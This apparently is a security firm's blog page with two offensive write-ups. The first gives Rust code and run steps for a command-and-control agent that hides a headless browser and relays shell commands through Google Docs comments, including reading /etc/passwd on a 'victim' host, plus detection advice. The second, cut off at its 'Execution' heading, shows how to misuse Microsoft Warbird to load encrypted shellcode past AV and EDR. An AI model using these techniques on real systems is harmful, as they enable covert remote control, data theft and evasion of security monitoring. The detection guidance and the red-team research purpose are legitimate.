Google DoC2

November 7, 2024

Google DoC2 - Using Google Docs as a C2 proxy with a headless browser

TL;DR

When building your C2 agent, you may want to avoid outbound traffic directly from your agent to the C2 server for a number of reasons. You may have strict firewall rules that block all non-browsers from accessing the Internet, or you may want to bypass a proxy that only allows access to certain trusted websites. By spawning a headless browser process and using the Chrome DevTools Protocol to interact with a website, you can use the browser’s network stack to send and receive data, effectively bypassing any firewall or web proxy. In this article we show how to use any Chromium-based browser as a C2 agent and Google Docs as a C2 proxy and how to detect this. We provide sample code in Rust and a basic agent and server that can be used to execute shell commands on the agent and receive the output of the commands. Check out the PoC on GitHub.

Introduction

In recent years, the (ab)use of existing services such as Notion and Slack for command and control (C2) has become increasingly popular. However, all these techniques communicate with the service’s API directly from the agent. This may not always be possible or desirable, so in this article we explore another approach to C2 that uses a headless browser to communicate with the C2 server.

The idea

The Chromium browser, which is the basis for many popular browsers, such as Google Chrome, Microsoft Edge and Brave, provides many useful command-line options that can be used to instrument and interact with the browser programmatically. This is useful for a variety of use cases, such as automated testing, web scraping and, as we will see, C2. So instead of launching the browser with chromium, we can start it with several command-line options that allow us to change its behavior. Note that we are in full control of the browser, so we do not need to use any kind of browser exploit or vulnerability here; we are only using fully intended features of the browser.

Headless mode

The first thing we need to do is start the browser in headless mode, which means that it will not display any windows, but will still run as a normal browser. This is useful for our purposes as we do not want to alert the user that the browser is running.

This is quite easy to do: we just need to add the --headless option to the command line. For example, to start the browser in headless mode, we can use the following command:

$ chromium --headless

Chrome DevTools Protocol (CDP)

To quote the official documentation:

The Chrome DevTools Protocol allows for tools to instrument, inspect, debug and profile Chromium, Chrome and other Blink-based browsers.

You can experiment with what is possible with the protocol by opening this article in a Chromium-based browser and pressing F12 to open the developer tools. Anything you can do in the developer tools can also be done with the CDP.

For example, open the developer tools and navigate to the Console tab. Then type the following command:

window.alert("DevTools Protocol is awesome: " + window.location);

As you can see, the browser displays an alert with the URL of the current page. This proves that we can execute arbitrary JavaScript in the context of any web page.

Using CDP programmatically

By starting the browser with the --remote-debugging-port option, the browser will start a WebSocket server on the specified port (or choose a random port if 0 is specified). We can then connect to this WebSocket server and send commands to the browser using the CDP:

$ chromium --headless --remote-debugging-port=0
[...]
DevTools listening on ws://127.0.0.1:32785/devtools/browser/ab4c2a5e-182c-4163-9d98-a0e327635395
[...]
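
To make the launch step concrete, here is a minimal sketch that uses only the Rust standard library. It assumes the browser prints its “DevTools listening on ...” line to stderr, as in the output above. The function names and the `binary` parameter are hypothetical and not part of the PoC, which leaves launching the browser to a library.

```rust
use std::io::{BufRead, BufReader};
use std::process::{Child, Command, Stdio};

/// Extracts the WebSocket URL from a line such as
/// "DevTools listening on ws://127.0.0.1:32785/devtools/browser/<id>".
fn parse_devtools_url(line: &str) -> Option<&str> {
    let url = line.trim().strip_prefix("DevTools listening on ")?;
    if url.starts_with("ws://") {
        Some(url)
    } else {
        None
    }
}

/// Spawns the browser and reads its stderr until the endpoint is announced.
/// `binary` is an assumption, e.g. "chromium"; adjust it for your system.
fn launch_headless(binary: &str) -> std::io::Result<(Child, Option<String>)> {
    let mut child = Command::new(binary)
        .args(["--headless", "--remote-debugging-port=0"])
        .stdout(Stdio::null())
        .stderr(Stdio::piped())
        .spawn()?;
    let stderr = child.stderr.take().expect("stderr was requested as piped");
    let mut url = None;
    for line in BufReader::new(stderr).lines() {
        let line = line?;
        if let Some(found) = parse_devtools_url(&line) {
            url = Some(found.to_string());
            break;
        }
    }
    Ok((child, url))
}
```

Calling `launch_headless("chromium")` would return the child process handle together with the WebSocket URL, if one was announced before the browser closed its stderr.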

We can connect to the browser and send commands using a WebSocket client and implementing the CDP manually. However, this approach is cumbersome and error prone. To avoid this, we will use a library that handles these tasks for us.
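
To give an idea of what a manual implementation involves: CDP messages are JSON objects with an `id`, a `method` and `params`. The sketch below builds a request for the `Runtime.evaluate` method by hand. The helper names are hypothetical, and a real client would also need a WebSocket connection, target and session handling, and response parsing, which is exactly the work a library takes over.

```rust
/// Escapes a string for embedding in a JSON string literal.
fn json_escape(input: &str) -> String {
    let mut out = String::with_capacity(input.len());
    for c in input.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            '\r' => out.push_str("\\r"),
            '\t' => out.push_str("\\t"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

/// Builds a `Runtime.evaluate` request. The `id` is chosen by the client
/// and echoed back in the response, so replies can be matched to requests.
fn runtime_evaluate(id: u32, expression: &str) -> String {
    format!(
        "{{\"id\":{},\"method\":\"Runtime.evaluate\",\"params\":{{\"expression\":\"{}\"}}}}",
        id,
        json_escape(expression)
    )
}
```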

Typically, Node.js or Python are used to interact with the browser since there are popular libraries for both languages that implement the CDP, such as puppeteer for Node.js and pyppeteer for Python. However, in the context of C2, we may prefer to use a compiled language instead of an interpreted one. Therefore, we will use Rust along with the chromiumoxide library, which offers a high-level API for interacting with the browser through the CDP. This enables us to send commands to the browser and receive results with ease.

Using Google Docs as a C2 proxy

To illustrate the concept, we will use Google Docs as a C2 proxy. Current techniques, such as OffensiveNotion, require the agent to contain an API key that is used to access the service. However, because we have the ability to interact with the browser instead of relying on an API, we can use any website as a C2 proxy, as long as we can interact with it using the CDP. Choosing Google Docs as a C2 proxy has the added benefit that it is unlikely to be blocked by any firewall or proxy, as it is a trusted website and requires no authentication when a document is shared using the “Anyone with the link can edit” permission.

Implementation

Interacting with Google Docs using the CDP

First, we need to develop the required abstractions so that we can programmatically interact with Google Docs using the CDP.

For the test setup, we first create a new Google Docs document and share it with the “Anyone with the link can edit” permission as shown in Figure 1.

Frederik Reiter

Consultant

Figure 1: Sharing a Google Doc with the “Anyone with the link can edit” permission

This will generate a link like below, which we will refer to as the “Docs URL” from now on. Let’s save it to an environment variable for later use:

$ export DOCS_URL="https://docs.google.com/document/d/XXXXXXXX/edit?usp=sharing"

Now, we need to identify the elements on the page that we can interact with. To achieve this, we can open the developer tools and inspect the page. By using the “Element selector” tool, we can select the elements we want to interact with. In this case, we want to interact with the content area where the text content of the document is displayed, enabling us to read and write data to the document. Using the “Element selector” and clicking on the content area as shown in Figure 2, we can see that, unfortunately for us, the body of the document seems to be some kind of “canvas” element, which is awkward to interact with using the CDP because it only contains image data. If we wanted to read the text, we’d have to first read the image from the webpage, then use optical character recognition to extract the text.

<div class="kix-page-paginated canvas-first-page" style="position: absolute; top: 5px; left: 5px; z-index: 0; width: 794.4px; height: 1123.2px;"><canvas class="kix-canvas-tile-content" width="993" height="1404" style="z-index: 0; width: 794.4px; height: 1123.2px;" dir="ltr"></canvas></div>
Figure 2: Inspecting the Google Docs page

To work around this issue, we explored other methods of modifying the state of the document and eventually landed on the idea of using the Comments feature of Google Docs. As comments are not part of the canvas element, we can interact with them using the CDP more easily. The only requirement is that the document is not completely empty because the comments are always attached to a specific position in the document. So, if you’re following along, make sure to type some text in the document so that comments can be added.

Adding a comment to the document

So, as a first step, we want to write code that adds a new comment to the document. By clicking on “Insert” (div#docs-insert-menu), followed by the “m” key, we can add a comment to the document. By typing in the comment field (div.docos-input-contenteditable) and clicking on the “Comment” button (div.docos-input-buttons-post), we will add a comment to the document. This comment can then be read by the C2 server and used to get information from the agent. The reverse is also possible: the C2 server can add a comment to the document, which the agent can then read and act upon.

We can easily implement the process outlined above using the CDP.

First, we click on the “Insert” menu and press the “m” key:

page.find_element("div#docs-insert-menu").await?
   .click().await?
   .press_key("m").await?;

Then, we find the comment field and insert the text we want to add to the document:

page.find_element("div.docos-input-contenteditable").await?
   .click().await?
   .type_str("Hello, world!").await?
   .click().await?;

Finally, we click on the “Comment” button to add the comment to the document:

page.find_element("div.docos-input-buttons-post").await?
   .click().await?;

Now, running the code will add a comment to the document. The full code for adding a comment is implemented in src/lib.rs in the GitHub repository. An example of how to use the library to add a comment to the document can be found in examples/add_comment.rs and can be run using the following command:

$ cargo run --example add_comment
   Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s

As shown in Figure 3, the comment is successfully added to the document.

Figure 3: A comment added to the document by the agent

Reading comments from the document

Next, we want to read the comments from the document. We need this functionality to receive commands from the C2 server and on the server side to receive the output of the commands executed by the agent.

Reading all comments from the document is quite straightforward because all comments are stored in a div with the class docos-replyview-body. Using the CDP, we can find all elements with this class and read the text of the comments:

let mut comments = Vec::new();
for comment in page
   .find_elements("div.docos-replyview-body")
   .await?
   .into_iter()
{
   if let Some(comment) = comment.inner_text().await? {
       comments.push(comment);
   }
}

This is also implemented in src/lib.rs. An example of how to use the library to read all comments from the document can be found in examples/read_comments.rs and can be run using the following command:

$ cargo run --example read_comments
   Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
[examples/read_comments.rs:11:5] c2.read_all_comments().await? = [
   "Hello, World!",
]

We can see that the comment “Hello, World!” that we added earlier is returned by the function.

Encoding data in comments

Now that we have the necessary abstractions to send and receive data “through” the document, we need to specify an encoding that the agent and the server will use to encode and decode the data.

For this PoC, we will be executing shell commands on the agent and returning the output to the server, so not much encoding is required. We only need a way to indicate if a comment is a command or the output of a command. In production, you would probably want to use a more sophisticated encoding and layer some kind of public key cryptography on top of it to ensure that only the C2 server can issue commands (with the corresponding private key) and that only the server can read the output of the commands (encrypted with the public key).

All messages are hex encoded. The first byte of the message indicates if the message is a command (0x01) or the output of a command (0x02). The next 12 bytes of the message are the message ID, which is used to match the output of a command to the command itself. The 0x01 (command) message is then followed by the command, and the 0x02 (output) message is followed by the output of the command with the corresponding message ID. We also add a third message type, 0x03, which is used to indicate that the agent should exit.

All in all, the encoding is specified by these Rust types with some convenience functions to encode and decode the messages implemented in src/shell.rs:

#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub enum MessageType {
   Command = 0x01,
   Output = 0x02,
   Exit = 0x03,
}
#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub struct Message {
   pub message_type: MessageType,
   pub message_id: [u8; 12],
   pub message: String,
}
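
As an illustration of the format described above, the following sketch encodes and decodes such messages using only the standard library. It is not the code from src/shell.rs: the function names `encode` and `decode` and the choice to ignore malformed comments are assumptions made for this example.

```rust
#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum MessageType {
    Command = 0x01,
    Output = 0x02,
    Exit = 0x03,
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Message {
    pub message_type: MessageType,
    pub message_id: [u8; 12],
    pub message: String,
}

/// Serializes a message as hex(type byte || 12-byte ID || UTF-8 payload).
pub fn encode(msg: &Message) -> String {
    let mut bytes = vec![msg.message_type as u8];
    bytes.extend_from_slice(&msg.message_id);
    bytes.extend_from_slice(msg.message.as_bytes());
    bytes.iter().map(|b| format!("{:02x}", b)).collect()
}

/// Returns None for anything that is not a well-formed message, so that
/// unrelated comments in the document are simply skipped.
pub fn decode(hex: &str) -> Option<Message> {
    let hex = hex.trim();
    // 1 type byte + 12 ID bytes = at least 26 hex characters.
    if hex.len() < 26 || hex.len() % 2 != 0 || !hex.bytes().all(|b| b.is_ascii_hexdigit()) {
        return None;
    }
    let bytes = (0..hex.len())
        .step_by(2)
        .map(|i| u8::from_str_radix(&hex[i..i + 2], 16).ok())
        .collect::<Option<Vec<u8>>>()?;
    let message_type = match bytes[0] {
        0x01 => MessageType::Command,
        0x02 => MessageType::Output,
        0x03 => MessageType::Exit,
        _ => return None,
    };
    let mut message_id = [0u8; 12];
    message_id.copy_from_slice(&bytes[1..13]);
    let message = String::from_utf8(bytes[13..].to_vec()).ok()?;
    Some(Message { message_type, message_id, message })
}
```

With this layout, a Command message carrying `hostname` becomes `01`, followed by 24 hex characters for the ID and `686f73746e616d65` for the command text.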

Putting it all together

We now have the required abstractions to interact with Google Docs using the CDP and have defined an encoding for the messages. Let’s put it all together to create an agent and server pair that can be used to execute shell commands on the agent and receive the output of the commands.

The agent starts a headless browser and then enters a loop where it reads comments from the document, decodes them, executes the command, and then writes the output of the command back to the document.

The server asks the operator for a command, encodes it, and then writes it to the document. It will then wait for the output of the command, decode it, and print it to the operator. It also can send the special 0x03 message to the agent to make it exit. We also added a few utility functions, such as clearing all comments from the document and displaying all already present comments.

The full code for the agent and server can be found in the examples directory of the repository, in shell_agent.rs and shell_server.rs respectively.
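
One detail the agent loop has to handle is not running the same command twice, since old comments remain in the document. The sketch below shows one possible way to decide what to do after each pass over the decoded comments: stop on an exit message, otherwise select the commands whose ID has no matching output yet. The types and the `next_step` function are hypothetical, and the PoC may solve this differently.

```rust
use std::collections::HashSet;

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum Kind {
    Command,
    Output,
    Exit,
}

#[derive(Debug, Clone, PartialEq, Eq)]
struct Decoded {
    kind: Kind,
    id: [u8; 12],
    body: String,
}

/// What the agent should do after one pass over the document's comments.
#[derive(Debug, PartialEq, Eq)]
enum Step {
    Run(Vec<Decoded>),
    Exit,
}

fn next_step(messages: &[Decoded]) -> Step {
    if messages.iter().any(|m| m.kind == Kind::Exit) {
        return Step::Exit;
    }
    // IDs that already have an Output message were handled earlier.
    let answered: HashSet<[u8; 12]> = messages
        .iter()
        .filter(|m| m.kind == Kind::Output)
        .map(|m| m.id)
        .collect();
    let pending: Vec<Decoded> = messages
        .iter()
        .filter(|m| m.kind == Kind::Command && !answered.contains(&m.id))
        .cloned()
        .collect();
    Step::Run(pending)
}
```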

To run the example:

  1. Clone the repository (git clone https://github.com/cirosec/google-doc2).
  2. Create a new Google Docs document and share it with the “Anyone with the link can edit” permission.
  3. Type some text in the document so that it is not empty. If you want, you can keep the document open in your normal browser to see the comments being added.
  4. Set the “DOCS_URL” environment variable to the URL of the document and run the agent:
    $ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing" 
    $ cargo run --example shell_agent    
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
    Running `target/debug/examples/shell_agent`
  5. Run the server in another terminal and execute some commands, in this case hostname and cat /etc/passwd | head:
    $ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing"
    $ cargo run --example shell_server
       Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
    Successfully opened Google Docs!
    Choose an action: Submit a new command
    Enter a command: hostname
    -> victim
    Choose an action: Submit a new command
    Enter a command: cat /etc/passwd | head
    -> root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    Choose an action: Exit

    As you can see, the server is able to send commands to the agent and receive the output of the commands. The agent is able to execute the commands and send the output back to the server.

Blue Team Perspective

All C2 traffic generated by this technique is sent out by an unmodified browser executable. In the case of Microsoft Edge, the executable is even signed by Microsoft! This makes it very difficult for blue teamers to detect that something is up and even if someone notices the channel, all traffic is sent “encoded” through the Google Docs API, which is not very straightforward to understand. As an example, here’s the POST request apparently responsible for adding a comment to the document:

POST /document/d/XXXXXXXX/docos/p/sync?id=XXXXXXXX&reqid=3&sid=XXXXXXXX&vc=1&c=1&w=1&flr=0&smv=52&smb=XXX
&token=XXXXX&includes_info_params=true&cros_files=false HTTP/2
Host: docs.google.com
[...]
p=%5B%5B%5B%22XXXXXXXX%22,%5Bnull,null,%5B%22text/html%22,%22
test%20comment%22%5D,%5B%22text/plain%22,%22test%20comment%22%5D,%5B%22
Anonym%22,null,%22//ssl.gstatic.com/docs/common/blue_silhouette96-0.png%22,%22ANONYMOUS_105250506097979753968%22,1%5D,1712922484034,1712922484034,
null,%5B%22text/plain%22,%22Hello,%20world!aa%22%5D,null,%22XXXXXXXX%22,1%5D,1712922484034,
null,null,null,null,%22kix.290cok7o9jiy%22,1%5D%5D,1712921888390%5D

The comment text is in there, but from a blue team perspective it seems very difficult to figure out what is going on based on that traffic alone, especially if the comment text is encrypted and obfuscated before being added to the document.
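
For analysts who capture such a request, a first step is to undo the percent-encoding of the body. The following is a minimal sketch of a percent-decoder using only the standard library. The function names are hypothetical, and it deliberately leaves “+” untouched and passes malformed escapes through unchanged.

```rust
/// Returns the numeric value of a single hexadecimal digit.
fn hex_val(b: u8) -> Option<u8> {
    match b {
        b'0'..=b'9' => Some(b - b'0'),
        b'a'..=b'f' => Some(b - b'a' + 10),
        b'A'..=b'F' => Some(b - b'A' + 10),
        _ => None,
    }
}

/// Decodes %XX escapes; anything that is not a valid escape is kept as-is.
fn percent_decode(input: &str) -> String {
    let bytes = input.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' && i + 2 < bytes.len() {
            if let (Some(hi), Some(lo)) = (hex_val(bytes[i + 1]), hex_val(bytes[i + 2])) {
                out.push((hi << 4) | lo);
                i += 3;
                continue;
            }
        }
        out.push(bytes[i]);
        i += 1;
    }
    String::from_utf8_lossy(&out).into_owned()
}
```

Applied to the fragment `%5B%22text/plain%22,%22test%20comment%22%5D` from the request above, this yields `["text/plain","test comment"]`.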

Additionally, this technique may be used with any other service that provides functionality similar to Google Docs. To detect this behavior more generally, we can instead focus on the way the Chromium instance is launched by the agent. This differs from a normal execution of Chromium because the executable is started with at least the two flags --remote-debugging-port=0 and --headless that we discussed earlier. In actuality, the library uses a lot more arguments, but only these two are strictly necessary. Therefore, if you’d like to build alerting for this type of C2 channel, we’d recommend setting up alerts on processes of Chromium-based browsers (so Chromium, Chrome, Edge, Brave and the like) with either of these two flags present. During normal operation of Chromium, we haven’t seen any uses of these flags, but they are not malicious in themselves and may be used by developers when running automated tests on web applications, so you might need to configure allowlists for developer machines as necessary.
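
The alerting logic described above can be sketched as a simple predicate over a process’s executable path and arguments. This is an illustration only: the list of executable names is an assumption that needs to be adapted to the environment, and in practice such a rule would live in an EDR or SIEM query rather than in Rust code.

```rust
// Assumed executable names (without ".exe"); extend as needed.
const BROWSER_NAMES: [&str; 5] = ["chromium", "chromium-browser", "chrome", "msedge", "brave"];
const SUSPICIOUS_FLAGS: [&str; 2] = ["--headless", "--remote-debugging-port"];

/// Checks whether the file name of `executable` matches a known browser.
fn is_chromium_based(executable: &str) -> bool {
    let file = executable
        .rsplit(|c: char| c == '/' || c == '\\')
        .next()
        .unwrap_or(executable)
        .to_ascii_lowercase();
    let stem = file.strip_suffix(".exe").unwrap_or(&file);
    BROWSER_NAMES.iter().any(|name| *name == stem)
}

/// Flags browser processes started with either flag, with or without a
/// value (e.g. "--headless", "--headless=new", "--remote-debugging-port=0").
fn is_suspicious(executable: &str, args: &[&str]) -> bool {
    is_chromium_based(executable)
        && args.iter().any(|arg| {
            SUSPICIOUS_FLAGS.iter().any(|flag| {
                *arg == *flag
                    || arg
                        .strip_prefix(*flag)
                        .map_or(false, |rest| rest.starts_with('='))
            })
        })
}
```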

Conclusion

In this article, we demonstrated that it is possible to use a headless browser, normally already present on the target system, as a proxy for C2 communication. For the PoC we used Google Docs, but hopefully it is clear that any website can be used as a C2 proxy, as long as it can be used to transmit and receive data using the CDP. All the code for the PoC can be found on GitHub.

In practice, this technique should be built upon by adding more sophisticated encoding and asymmetric encryption, and by customizing the website used to fit the scenario of the red team engagement. For example, the website could be a company-internal website, which would make it even less likely to be blocked by any firewall or proxy.

Abusing Microsoft Warbird for Shellcode Execution

November 7, 2024

TL;DR

In this blog post, we’ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. We’ll show how we can encrypt our shellcode and let the Windows kernel decrypt and load it for us using the Warbird API. Using this technique, you can hide your shellcode from syscall-intercepting EDR solutions allowing you to allocate executable memory, decrypt the shellcode, and jump to the decrypted shellcode all in one syscall, without ever having decrypted shellcode at any writeable memory region at any point during the execution of your process. Check out the PoC on GitHub.

Basics

Introduction

Microsoft Warbird is Microsoft’s undocumented internal code protection and obfuscation framework. It is used for DRM to protect sensitive code from reverse engineering and tampering. Warbird supports multiple obfuscation techniques like VM-based obfuscation, constant obfuscation, section encryption or runtime code protection. According to This is Security, Microsoft Warbird was introduced in Windows 8/2012. One application is, e.g., the Microsoft Software Protection Platform Service (sppsvc.exe), which handles the Windows activation algorithms.

The Warbird framework is intended to be used exclusively by Microsoft services. The functionality provided by Warbird is not intended to be used by third-party developers, and Microsoft actively tries to prevent this. Before we show you how to abuse it anyway, let’s first describe how Microsoft services would normally use Warbird.

Runtime Code Protection

The feature of Warbird that we are interested in for loading shellcode is the runtime decryption of code.

The runtime decryption feature of Warbird allows for the execution of encrypted code. The code is encrypted using a custom Feistel cipher developed specifically for Warbird. How exactly a Feistel cipher works is not important for us right now, just know that it is a symmetric encryption algorithm that operates on blocks of data.
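
For readers who would like some intuition anyway, here is a toy Feistel network on 64-bit blocks. It is a generic illustration and not Warbird’s cipher: the round function and the way round keys are supplied are made up for this example. The point it shows is that decryption reuses the same round function and merely applies the rounds in reverse order.

```rust
/// Toy round function, an assumption for illustration only. Warbird's
/// real round functions are different.
fn round_fn(half: u32, round_key: u32) -> u32 {
    half.rotate_left(5).wrapping_mul(0x9E37_79B1) ^ round_key
}

/// Each round maps (L, R) to (R, L xor F(R, k)).
fn encrypt_block(block: u64, round_keys: &[u32]) -> u64 {
    let (mut left, mut right) = ((block >> 32) as u32, block as u32);
    for &k in round_keys {
        let next = left ^ round_fn(right, k);
        left = right;
        right = next;
    }
    ((left as u64) << 32) | right as u64
}

/// Undoes the rounds in reverse order; F itself is never inverted.
fn decrypt_block(block: u64, round_keys: &[u32]) -> u64 {
    let (mut left, mut right) = ((block >> 32) as u32, block as u32);
    for &k in round_keys.iter().rev() {
        let prev = right ^ round_fn(left, k);
        right = left;
        left = prev;
    }
    ((left as u64) << 32) | right as u64
}
```

Because the round function never has to be inverted, it can be arbitrarily complicated, which makes this construction convenient for building custom ciphers.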

When Warbird was first introduced, the decryption and execution of the basic blocks were simply performed by the process in user mode. This meant that when the executing process wanted to execute encrypted code, it would use the Feistel cipher to decrypt it, allocate new executable memory, place the decrypted code in this memory, and then jump to the beginning of the decrypted code.

To mitigate some unrelated attack vectors (think ROP chains and the like), at some point Microsoft decided that some user mode processes are forbidden from allocating new executable memory, by introducing Arbitrary Code Guard (ACG). This prevents memory corruption exploits from using the Windows API to allocate new executable memory and placing their shellcode there. ACG also prevented Warbird from working in these processes, so the decryption and allocation of the encrypted code was moved to the kernel level. This means that the Windows kernel is responsible for allocating memory in the process’s heap and marking it as executable, so that Warbird can be used even when the executing process is not allowed to allocate executable memory, for example in specially protected browser processes of the legacy Microsoft Edge. To reiterate, Microsoft decided that it would be safer to offer a kernel-level API for the decryption and allocation of code, rather than allowing the process itself to decrypt its encrypted code, which should be enough to raise some eyebrows.

The flow of the runtime decryption routine is as follows:

  1. The process wants to execute encrypted code.
  2. The process locates the corresponding encrypted code in its own memory and passes it to the kernel.
  3. The kernel decrypts the code, allocates a new executable memory region in the process’s heap, copies the decrypted code into this new memory region, and marks it as executable.
  4. The kernel passes execution control back to the process at the beginning of the decrypted code.
Figure 1: Runtime decryption of encrypted code using Warbird
Jan-Luca Gruber and Frederik Reiter

Consultants


Feistel Cipher

The Feistel cipher used by Warbird is a custom implementation that Microsoft does not document at all.

Thankfully, a blog post by DownWithUp already documents how the Warbird API can be used to encrypt arbitrary data using a clever combination of syscalls to make the kernel perform the encryption for you. That way, we can use the kernel as a “black box” implementation of the Feistel cipher, without having to know the details of the cipher itself.

We experimented with their technique to encrypt data for the Warbird decryption routine but were unable to use the encrypted data with the runtime decryption. Luckily for us, a source code leak of the Warbird framework from 2017 contains a working implementation of the Feistel cipher used by Warbird, which we can use to encrypt our shellcode for the runtime decryption routine. This source code has been circulating on the internet for a while and has recently become available on GitHub.

Warbird Syscall

To request a decryption and allocation from the kernel, the process must call the NtQuerySystemInformation syscall with the SystemInformationClass set to SystemCodeFlowTransition (0xB9). Although this is not officially documented by Microsoft, thanks to the leak of Windows source code, we have access to a lot of information about this syscall. The syscall takes a pointer to a struct containing a WbOperationType that specifies the operation to be performed, and a pointer to a struct containing additional data for the operation. According to the leaked source code, the WbOperationType enum contains the following values:

typedef enum {
   WbOperationNone,
   WbOperationDecryptEncryptionSegment,
   WbOperationReEncryptEncryptionSegment,
   WbOperationHeapExecuteCall,
   WbOperationHeapExecuteReturn,
   WbOperationHeapExecuteUnconditionalBranch,
   WbOperationHeapExecuteConditionalBranch,
   WbOperationProcessEnd,
   WbOperationProcessStartup,
} WbOperationType;

We will focus on the WbOperationHeapExecuteCall operation, which can be used to perform the described decryption and allocation routine in the kernel. The struct that is passed to the syscall for this operation is also part of the leaked source code but appears to have changed slightly since the leak. Combining the leak with the information from Alex Ionescu’s talk about Warbird at Ekoparty 2017, we can assume that the struct looks something like this:

typedef struct _HEAP_EXECUTE_CALL_ARGUMENT {
   uint8_t ucHash[0x20];
   uint32_t ulStructSize;
   uint32_t ulZero;
   uint32_t ulParametersRva;
   uint32_t ulCheckStackSize;
   uint32_t ulChecksum : CHECKSUM_BIT_COUNT;
   uint32_t ulWrapperChecksum : CHECKSUM_BIT_COUNT;
   uint32_t ulRva : RVA_BIT_COUNT;
   uint32_t ulSize : FUNCTION_SIZE_BIT_COUNT;
   uint32_t ulWrapperRva : RVA_BIT_COUNT;
   uint32_t ulWrapperSize : FUNCTION_SIZE_BIT_COUNT;
   uint64_t ullKey;
   WarbirdRuntime::FEISTEL64_ROUND_DATA RoundData[NUMBER_FEISTEL64_ROUNDS];
} HEAP_EXECUTE_CALL_ARGUMENT, * PHEAP_EXECUTE_CALL_ARGUMENT;

We’ll only highlight the most important fields for our purposes:

  • ucHash: A 32-byte SHA-256 hash of the following fields in the struct. If this hash does not match the hash of the rest of the struct, the kernel will refuse to perform the operation. This is used to prevent tampering with the struct, as the hash is calculated over the fields that are relevant for the decryption and allocation. Note that this hash does not provide authentication, only integrity, so an attacker could still modify the struct, given that they can calculate a new hash for the modified struct.
  • ulStructSize: The size of the struct in bytes.
  • ulRva: The offset of the encrypted code relative to the start of the struct in memory[1].
  • ulSize: The size of the encrypted code in bytes.
  • ullKey: The 8-byte key used for the Feistel cipher.
  • RoundData: Configuration data for each round of the Feistel cipher.

All other fields are not relevant for our purposes and should be set to zero.

The complete struct passed to the syscall then simply contains the WbOperationType, a pointer to the HEAP_EXECUTE_CALL_ARGUMENT struct, and a pointer to an NTSTATUS variable that will receive the result of the operation:

typedef struct _WB_OPERATION {
   WarbirdRuntime::WbOperationType OperationType;
   union {
       // ...
       PHEAP_EXECUTE_CALL_ARGUMENT pHeapExecuteCallArgument;
       // ...
   };
   NTSTATUS* Result;
} WB_OPERATION, * PWB_OPERATION;

Abusing Warbird

As previously stated, only Microsoft services are intended to invoke Warbird syscalls. To enforce this, the Windows kernel requires the HEAP_EXECUTE_CALL_ARGUMENT struct to be in a memory region that is marked with an ImageSigningLevel of 12, which indicates that the memory region “belongs to” a Windows component. As already noted by DownWithUp, this check can quite easily be bypassed by first loading a Microsoft-signed DLL into your own process, and then using VirtualProtect(RW) and memcpy to change the contents of the DLL’s .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct. For our convenience, we place the encrypted shellcode directly after the struct in the .text section and set the ulRva field simply to the size of the struct. This way, the kernel will decrypt the shellcode directly after the struct in the same memory region.

After the data has been placed, the .text section must be marked as executable using VirtualProtect(RX) and can then be used to invoke the Warbird syscall.

Preparation

We first need to encrypt the shellcode we want to execute using the Feistel cipher. We can use the implementation from the leaked Warbird source code to do this:

BYTE shellcode[] = { ...};
BYTE encrypted[sizeof(shellcode)];
auto cipher = WarbirdCrypto::CCipherFeistel64::CreateRandom();
WarbirdCrypto::CChecksum checksum;
WarbirdCrypto::CKey key { .u64 = 0xdeadbeefcafeaffe };
cipher->Encrypt((BYTE*) shellcode, (BYTE*) encrypted, sizeof(shellcode), key, 0xf0, &checksum);

The WarbirdCrypto namespace can be taken directly from the leaked source code and #included in your project. The headers from the leaked source code are not functional on their own, and require some additional includes to work, as well as a workaround to use them outside of the WarbirdRuntime namespace:

#include <Windows.h>
#include <set>
#include <sstream>
#define WARBIRD_CRYPTO_ENABLE_CREATE_RANDOM
#include "../warbird-example/WarbirdCUtil.inl"
#include "../warbird-example/WarbirdRandom.inl"
#define Random WarbirdRuntime::g_Rand.Random
#include "../warbird-example/WarbirdCiphers.inl"
#undef Random

To load the encrypted shellcode, we need to create the HEAP_EXECUTE_CALL_ARGUMENT struct:

HEAP_EXECUTE_CALL_ARGUMENT params{
   .ucHash = { }, // We'll leave this empty for now
   .ulStructSize = sizeof(HEAP_EXECUTE_CALL_ARGUMENT),
   .ulZero = 0,
   .ulParametersRva = 0,
   .ulCheckStackSize = 0,
   .ulChecksum = 0,
   .ulWrapperChecksum = 0,
   .ulRva = sizeof(HEAP_EXECUTE_CALL_ARGUMENT), // shellcode starts right after the struct
   .ulSize = static_cast<uint32_t>(sizeof(shellcode)),
   .ulWrapperRva = 0,
   .ulWrapperSize = 0,
   .ullKey = key.u64,
   .RoundData = { }
};
// Copy over the round configuration
memcpy(params.RoundData, cipher->m_Rounds, sizeof(cipher->m_Rounds));
// Lastly, calculate the hash of the struct
picosha2::hash256(
      reinterpret_cast<uint8_t*>(&params.ulStructSize), // Start after the hash field
      reinterpret_cast<uint8_t*>(&params + 1), // Up to the end of the struct
      reinterpret_cast<uint8_t*>(&params.ucHash), // Store the hash here
      reinterpret_cast<uint8_t*>(&params.ulStructSize) // End of the hash field
);

The picosha2 namespace is a simple SHA-256 implementation that can be found here.

Execution

